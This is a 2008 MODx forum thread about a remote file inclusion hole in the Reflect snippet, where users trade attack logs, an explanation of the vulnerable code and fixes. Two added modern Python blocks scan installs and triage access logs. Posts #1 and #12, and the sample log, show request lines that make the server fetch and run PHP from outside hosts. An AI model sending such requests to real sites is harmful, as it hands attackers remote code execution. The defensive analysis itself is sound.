Topic: 0.9.6.2 security problem with reflect snippets  (Read 35444 times)


#1: 24-Nov-2008, 04:09 AM

julien04
Posts: 4

Hi,

My 0.9.6.2 MODx site has been hacked with a Reflect snippet hack:
http://www.milw0rm.com/exploits/7204

Is this hack known here?

I've seen these GET requests in my logs:
IP www.mymodxsite.com - [24/Nov/2008:10:15:12 +0100] "POST //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.adultfirstdate.com/forum/spider.txt?? HTTP/1.1" 200 1138 "referer" "Opera/9.62 (X11; Linux i686; U; en) Presto/2.1.1"

He loads a PHP script for testing security and uploads other scripts easily.

Sorry for my bad English.

Julien

#2: 24-Nov-2008, 04:17 AM


shamblett
Posts: 799

I seem to be getting these also on my 0.9.6.1p2 install, from various IPs, but I'm returning either 404s or 200s with no output.
Use MODx, or the cat gets it!

#3: 24-Nov-2008, 04:24 AM

julien04
Posts: 4

No output, but he can execute PHP on your server.

On my server, he used snippet.reflect.php to load a "PHP shell".
Then he used this script to upload 2 PHP files (a mailer for spam and another PHP shell),
then he was spamming .....

#4: 24-Nov-2008, 04:33 AM


Kleist
Posts: 107

I think a fast fix would be to simply remove the file /assets/snippets/reflect/snippet.reflect.php. It shouldn't affect your usage of the Reflect snippet.

It contains the code for pasting into a snippet, and is not meant to be run on its own.

The reason this hack works is the following two lines:

Code:
$reflect_base = isset($reflect_base) ? $modx->config['base_path'].$reflect_base : $modx->config['base_path']."assets/snippets/reflect/";
...SNIP...
require($reflect_base."configs/default.config.php");

Since this file is called directly, $modx is not set, and hence $modx->config['base_path'] is an empty string, and $reflect_base is just $reflect_base. So whatever file is given as argument is loaded.

MODx snippet-glossary 101:
Ditto = Content Lister -- Wayfinder == Menu Builder -- Jot = Comment Control

#5: 24-Nov-2008, 04:39 AM


Kleist
Posts: 107

I filed a report to Trac for the Ditto project.

http://mirror3.cvsdude.com/trac/ditto/codebase/ticket/109

#6: 24-Nov-2008, 05:24 AM

Testers
ncrossland
Posts: 256

If I try that, it gives an error:

Code:
Warning: require(assets/snippets/reflect/configs/default.config.php) [function.require]: failed to open stream: No such file or directory in /home/XXXXXXXX/public_html/assets/snippets/reflect/snippet.reflect.php on line 60

Fatal error: require() [function.require]: Failed opening required 'assets/snippets/reflect/configs/default.config.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/XXXXXXXX/public_html/assets/snippets/reflect/snippet.reflect.php on line 60
Author: ManagerManager plugin - customise your ModX manager interface

#7: 24-Nov-2008, 05:59 AM


Kleist
Posts: 107

Quote from: ncrossland
If I try that, it gives an error:

You probably have register_globals set to off?
 
If I analyzed the code correctly, the bug is only present with register_globals=on.

#8: 24-Nov-2008, 06:25 AM

Coding Team
heliotrope
Posts: 2,545

Hi,

As the snippet is stored in the DB, the file is useless and should be deleted.
I'm currently trying a patch on one of my sites that has been attacked.
I've added at the beginning of the file

if(empty($modx->config)) die ('you should not be there !');

This should do the trick

:-)

EDIT: this fix should be tweaked in case $modx->config is filled in by the hack.

« Last Edit: 24-Nov-2008, 06:42 AM by heliotrope »

#9: 24-Nov-2008, 06:46 AM


Kleist
Posts: 107

I think a good way to fix this would be with a define saying whether or not this is called as a snippet.

Another way would be not to put snippet contents up as files (especially with the php-extension).

If the file was distributed as snippet.reflect.php.txt instead, there would be no issue.

#10: 24-Nov-2008, 12:53 PM

Coding Team

BobRay
Posts: 6,124

Quote from: Kleist
I think a good way to fix this would be with a define saying whether or not this is called as a snippet.

Another way would be not to put snippet contents up as files (especially with the php-extension).

If the file was distributed as snippet.reflect.php.txt instead, there would be no issue.

Another way might be to set a $_SESSION variable somewhere else (e.g. in Ditto) to a hash of a modx config variable and then check for it at the beginning of reflect snippet.
MODx info for newbies: http://bobsguides.com/MODx.html

#11: 25-Nov-2008, 02:14 AM

Testers
ncrossland
Posts: 256

We have many MODx installations on our server, so even though we have register_globals=off (which meant there was never any danger), as a quick fix yesterday I ran the following command (as root), just to deny any access to the file (without deleting it for now, until it is confirmed that it is not needed).

Code:
find . -name "snippet.reflect.php"  -exec chmod 0000 '{}' \;

We should now be able to remove them all with:

Code:
find . -name "snippet.reflect.php"  -exec rm -f  '{}' \;

Thought I'd pass it on in case it is useful to anyone.
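The per-server clean-up above, together with the two lines quoted in post #4 and the guard line from post #8, generalizes to a small fleet-triage script. The following is an added example (my code, not the project's and not from any poster): it walks a directory tree of MODx installs, classifies every copy of snippet.reflect.php as neutralized (mode 0000, as in the chmod step above), guarded (the die() guard precedes the require), vulnerable, or unknown, and then neutralizes only the vulnerable copies. The regex fingerprints are assumptions based on the lines quoted in this thread, and the sample files it builds in a temp directory are constructed stand-ins, not the real shipped file.

```python
import os
import re
import shutil
import stat
import tempfile

FILENAME = "snippet.reflect.php"

# Assumed fingerprints (mine, not the project's): the unguarded assignment quoted
# in post #4, and the guard line suggested in post #8. Adjust them to your release.
VULN_RE = re.compile(r"\$reflect_base\s*=\s*isset\(\$reflect_base\)")
GUARD_RE = re.compile(r"empty\(\$modx->config\)")

# Constructed stand-ins for the two states of the file (not the real shipped file).
VULN_SRC = (
    "<?php\n"
    "$reflect_base = isset($reflect_base) ? $modx->config['base_path'].$reflect_base"
    " : $modx->config['base_path'].\"assets/snippets/reflect/\";\n"
    "require($reflect_base.\"configs/default.config.php\");\n"
)
GUARDED_SRC = VULN_SRC.replace(
    "<?php\n", "<?php\nif(empty($modx->config)) die('you should not be there !');\n", 1
)


def assess(path):
    """Classify one copy: neutralized (mode 0000), guarded, vulnerable or unknown."""
    if stat.S_IMODE(os.stat(path).st_mode) == 0:
        return "neutralized"        # chmod 0000 already applied; do not even read it
    with open(path, encoding="utf-8", errors="replace") as fh:
        src = fh.read()
    vuln, guard = VULN_RE.search(src), GUARD_RE.search(src)
    if vuln is None:
        return "unknown"            # some other version: review by hand
    if guard is not None and guard.start() < vuln.start():
        return "guarded"            # die() runs before the require can be reached
    return "vulnerable"


def scan(root):
    """Map every snippet.reflect.php under root to its state."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        if FILENAME in files:
            path = os.path.join(dirpath, FILENAME)
            report[path] = assess(path)
    return report


def remediate(report, action="chmod", dry_run=True):
    """Neutralize vulnerable copies only. 'chmod' keeps the file for forensics
    (the first step in the post above); 'delete' removes it. The snippet itself
    lives in the database, so neither action affects pages that use Reflect."""
    if action not in ("chmod", "delete"):
        raise ValueError(action)
    done = []
    for path, state in sorted(report.items()):
        if state != "vulnerable":
            continue
        if not dry_run:
            if action == "chmod":
                os.chmod(path, 0)
            else:
                os.remove(path)
        done.append((path, action))
    return done


def demo():
    """Three fake installs in a temp dir: scan, fix, rescan; returns states by site."""
    root = tempfile.mkdtemp(prefix="modx-reflect-")
    try:
        for site, src in {"site1": VULN_SRC, "site2": GUARDED_SRC, "site3": VULN_SRC}.items():
            d = os.path.join(root, site, "assets", "snippets", "reflect")
            os.makedirs(d)
            with open(os.path.join(d, FILENAME), "w", encoding="utf-8") as fh:
                fh.write(src)

        def by_site(report):
            return {os.path.relpath(p, root).split(os.sep)[0]: s for p, s in report.items()}

        before = scan(root)
        fixed = remediate(before, action="chmod", dry_run=False)
        return {"before": by_site(before), "after": by_site(scan(root)), "fixed": len(fixed)}
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    print(demo())
```

Run `scan("/home")` with `dry_run=True` first to see what would be touched; the "unknown" state exists precisely so that a copy that differs from the quoted lines is reviewed by hand rather than silently left in place.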

#12: 25-Nov-2008, 04:04 AM


kp52
Posts: 532

I just spotted a heap of accesses to a Reflect file like the following in my logs:
GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.tecfedericotaylor.edu.gt/gif/prc.gif? HTTP/1.1
Is this the same kind of thing as above? What is it actually trying to do?

#13: 25-Nov-2008, 05:54 AM


Kleist
Posts: 107

Yes, it's the same.

It's trying to run its own PHP code on your server. The file http://www.tecfedericotaylor.edu.gt/gif/prc.gif contains PHP code. (Try save as, and give it the extension txt instead of gif to see it.)

This particular script seems to only gather and show info about the server, others do a lot more harm, like installing backdoors, adding MODx pages, etc.

#14: 25-Nov-2008, 06:44 AM

Moderators

MotSmart
MODx RTL Guru.
Posts: 927

Quote from: Kaspersky Internet Security 2009
Access denied
The requested URL could not be retrieved

While trying to retrieve the URL:

http://www.tecfedericotaylor.edu.gt/gif/
prc.gif

The following error was encountered:

The requested object is INFECTED with the following viruses: Trojan.PHP.Agent.a


Please contact your service provider if you consider it incorrect.
Generated:
Tue Nov 25 16:14:18 2008
Kaspersky Internet Security 2009
[Search] [Add-ons] | [MODx Lovers Don't miss this link!]
[Documentation] [Wiki]
[Persian support forum]
[RoadMap] [SVN] [RTL SVN Branch] [Development] [Trac] [FishEye+Crucible] [Confluence] | [My Google Code]
[برای دسترسی به راهنمای فارسی به  » وبگاه مادایکس فارسی « و یا به » انجمنهای پشتیبانی فارسی مادایکس « مراجعه کنید]
A Person is Either your Brother in Faith or Your Equal in Humanity. - Imam Ali.  # Discover Islam. | # Discover Middle East @ PressTV.Creation of Earth and Sky and the birth of Adam
BBC, CNN, FOX, MSNBC: Israeli officials: We don't want to kill (AKA Genocide) innocent people of Gaza. ~ Stupid Me, Myself: So why don't you stop doing so?!

#15: 25-Nov-2008, 09:30 AM


Kleist
Posts: 107

That security warning is a bit weird. If you save the gif file as a txt file and look at the code (and know a little PHP), you'll see that the only thing it does is gather and show information.

Obviously it can be used for some bad stuff by including it in the reflect-snippet. But in itself I see no way that it could harm you, unless you put it up on your webserver and let other people access it...

#16: 25-Nov-2008, 10:08 AM


Chuck
Posts: 174

The logs for one of my sites show hundreds of requests for the reflect script starting on Sunday around 5pm MT and continuing regularly through this morning (39 hours).  I have renamed the reflect file for now.  Apache access log indicates codes 500, 200 and 404 for the attempts on the reflect file.  The error log is filled with notices and warnings of undefined variables, properties of non-objects and failures to open streams.  The 200 means OK and has me digging deeper into what has been happening.  My website file counts and file sizes all appear to be in order so far after an initial inspection.  More to come...
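Posts #1, #12 and #16 all work from access-log lines, so here is an added example (my code, not from the thread or the MODx project) of the triage a practitioner would run over such a log: it parses Apache combined-format lines, keeps only requests to snippet.reflect.php, extracts reflect_base, flags the ones pointing at a remote URL, and maps the response code to a rough verdict (a 200 on a remote reflect_base means the script ran and the payload may have been included; a 404 or 403 means the file was gone or blocked; anything else errored). The sample log is constructed, modelled on the lines quoted above with documentation-range IPs and a placeholder payload host; the verdict mapping is my assumption and should be confirmed against the error log and the filesystem.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Apache "combined" access-log line: only the fields the triage needs are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)
TARGET_FILE = "snippet.reflect.php"
REMOTE_SCHEMES = ("http://", "https://", "ftp://")

# Constructed sample log, modelled on the requests quoted in this thread
# (not a real log; IPs are documentation ranges, the payload host is a placeholder).
SAMPLE_LOG = """\
203.0.113.5 - - [24/Nov/2008:10:15:12 +0100] "POST //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://attacker.example/forum/spider.txt?? HTTP/1.1" 200 1138 "-" "Opera/9.62 (X11; Linux i686; U; en) Presto/2.1.1"
198.51.100.7 - - [25/Nov/2008:03:02:41 +0100] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://attacker.example/gif/prc.gif? HTTP/1.1" 500 612 "-" "Mozilla/4.0"
198.51.100.7 - - [25/Nov/2008:03:02:43 +0100] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://attacker.example/gif/prc.gif? HTTP/1.1" 404 231 "-" "Mozilla/4.0"
192.0.2.9 - - [25/Nov/2008:09:10:00 +0100] "GET /index.php?id=12 HTTP/1.1" 200 8812 "-" "Mozilla/5.0"
192.0.2.9 - - [25/Nov/2008:09:10:05 +0100] "GET /assets/snippets/reflect/snippet.reflect.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
"""


def verdict(remote, status):
    """Rough meaning of one status code (assumption: a 200 with a remote
    reflect_base means the script ran and may have included the payload)."""
    if not remote:
        return "probe"               # no remote reflect_base: nothing to include
    if status == 200:
        return "possible-execution"  # check error log, new files, outbound mail
    if status in (403, 404):
        return "blocked-or-missing"  # file removed/chmod'd or access denied
    return "errored"                 # e.g. 500: include failed, still worth a look


def classify(line):
    """Return a dict describing a request to snippet.reflect.php, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, query = m.group("target").partition("?")
    if not path.endswith(TARGET_FILE):
        return None
    # parse_qs keeps the trailing '?' / '??' the attacker appends: it turns the
    # "configs/default.config.php" the snippet concatenates into a query string
    # on the remote URL, so the file fetched is exactly the attacker's payload.
    base = parse_qs(query, keep_blank_values=True).get("reflect_base", [""])[0]
    remote = base.lower().startswith(REMOTE_SCHEMES)
    status = int(m.group("status"))
    return {
        "ip": m.group("ip"),
        "ts": m.group("ts"),
        "method": m.group("method"),
        "status": status,
        "reflect_base": base,
        "remote": remote,
        "payload_host": urlsplit(base).netloc if remote else "",
        "verdict": verdict(remote, status),
    }


def triage(log_text):
    """All reflect hits in a log, in file order."""
    return [h for h in map(classify, log_text.splitlines()) if h]


def summarize(hits):
    """Counts per verdict plus the payload URLs/hosts and source IPs to block."""
    return {
        "verdicts": dict(Counter(h["verdict"] for h in hits)),
        "payload_urls": sorted({h["reflect_base"] for h in hits if h["remote"]}),
        "payload_hosts": sorted({h["payload_host"] for h in hits if h["remote"]}),
        "source_ips": sorted({h["ip"] for h in hits}),
    }


if __name__ == "__main__":
    hits = triage(SAMPLE_LOG)
    for h in hits:
        print(f'{h["ts"]} {h["ip"]:<14} {h["method"]:<4} {h["status"]} '
              f'{h["verdict"]:<20} {h["reflect_base"]}')
    print(summarize(hits))
```

Feed it a real access log with `triage(open("access.log").read())`; the "possible-execution" entries are the ones whose timestamps you then look up in the error log and compare against file modification times under the web root.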

#17: 25-Nov-2008, 10:52 AM

Moderators

MotSmart
MODx RTL Guru.
Posts: 927

Quote from: Kleist
That security warning is a bit weird. If you save the gif file as a txt file and look at the code (and know a little PHP), you'll see that the only thing it does is gather and show information.

Obviously it can be used for some bad stuff by including it in the reflect-snippet. But in itself I see no way that it could harm you, unless you put it up on your webserver and let other people access it...

Most of the time AVs detect viruses by their hex signature combination, which could easily be changed in any order, leaving the application functional but not recognized as infected. The same rules, or better said the same logic, are applied by AVs to recognize possible danger from server-side scripting language parameters, because they trace and combine the code rather than making a decision on the script's output or result. Whoo... well, again, most of the time they may fail to recognize which script is right or wrong, but for the code itself I trust the AV's detection.

#18: 25-Nov-2008, 11:06 AM

Testers

ZAP
Posts: 1,620

It's always seemed like a bad idea to me to ship snippet code (which is only intended to be copied and pasted into the Manager) with a .php extension. I think that this practice should be discontinued entirely. If these files are shipped with .txt extensions then there'd be no need to study and resolve possible security implications of running them independently (a context in which they were never intended to be used).

This example also demonstrates the utter folly of trying to keep your server secure while leaving register_globals set to ON. If you do this, then you should expect to be hacked at some point, since defending against every possible XSS attack while running any complex application like MODx is extremely difficult. Just changing that one setting in your .htaccess or php.ini file will allow you to sleep much better at night and spend your time doing more productive or enjoyable things.

If you have register_globals set to OFF then you are not vulnerable to this attack or any similar XSS attack.
"Things are not what they appear to be; nor are they otherwise." - Buddha

"Well, gee, Buddha - that wasn't very helpful..." - ZAP

Useful MODx links: documentation | wiki  | forum guidelines  | bugs & requests  | info you should include with your post | commercial support options

#19: 25-Nov-2008, 11:19 AM

Moderators

MotSmart
MODx RTL Guru.
Posts: 927

Quote from: ZAP
It's always seemed like a bad idea to me to ship snippet code (which is only intended to be copied and pasted into the Manager) with a .php extension. I think that this practice should be discontinued entirely. If these files are shipped with .txt extensions then there'd be no need to study and resolve possible security implications of running them independently (a context in which they were never intended to be used).

+1 on that.

#20: 25-Nov-2008, 12:00 PM


Chuck
Posts: 174

Quote from: ZAP
If you have register_globals set to OFF then you are not vulnerable to this attack or any similar XSS attack.

Interesting, the Secunia advisory doesn't say anything about register_globals and instead cites magic_quotes_gpc. Does register_globals off "trump" magic_quotes_gpc disabled?

http://secunia.com/Advisories/32824/

"Successful exploitation requires that "magic_quotes_gpc" is disabled."

